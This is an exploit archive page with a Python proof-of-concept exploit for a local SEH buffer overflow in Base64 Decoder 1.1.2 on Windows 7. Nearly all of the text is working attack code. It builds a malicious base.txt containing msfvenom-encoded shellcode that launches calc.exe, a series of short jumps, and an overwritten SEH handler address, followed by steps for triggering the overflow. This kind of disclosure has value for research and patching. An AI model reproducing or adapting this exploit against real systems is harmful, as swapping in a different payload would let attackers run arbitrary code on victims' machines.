base64 decoder 1.1.2 local buffer overflow (seh)
▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability Code...
 Code...
				
#!/usr/bin/env python # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH) # Date: 12-20-18 # Vulnerable Software: Base64 Decoder 1.1.2 # Vendor Homepage: http://4mhz.de/b64dec.html # Version: 1.1.2 # Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip # Tested Windows 7 SP1 x86 # PoC # 1. run script # 2. copy/paste base.txt contents into 'save to file' section of app # 3. select decode # 4. pop calc # orig dos poc from UN_NON, EDB: 39070 import struct junk3 = "\x41" * 90 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c #Payload size: 448 bytes calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b" "\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70" "\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62" "\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f" "\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69" "\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42" "\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c" "\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61" "\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57" "\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b" "\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64" "\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53" "\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61" "\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b" "\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e" "\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74" "\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b" "\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b" "\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73" "\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f" "\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31" "\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45" "\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50" "\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a" "\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53" "\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41") junk2 = "\xcc"*50 #jump to calc jmp3 = "\xe9\xaf\xfd\xff\xff\xcc" junk1 = "\xcc"*20 #jump to jmp3 jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc" #jump to jmp2 jmp1 = "\xeb\xf8\xcc\xcc" #0x0045241e : pop esi # pop ebx # ret seh = struct.pack('<L',0x0045241e) buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh with open("base.txt","wb") as f: f.write(buffer[:-1])
Base64 decoder 1.1.2 local buffer overflow (seh) Vulnerability / Exploit Source : Base64 decoder 1.1.2 local buffer overflow (seh)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes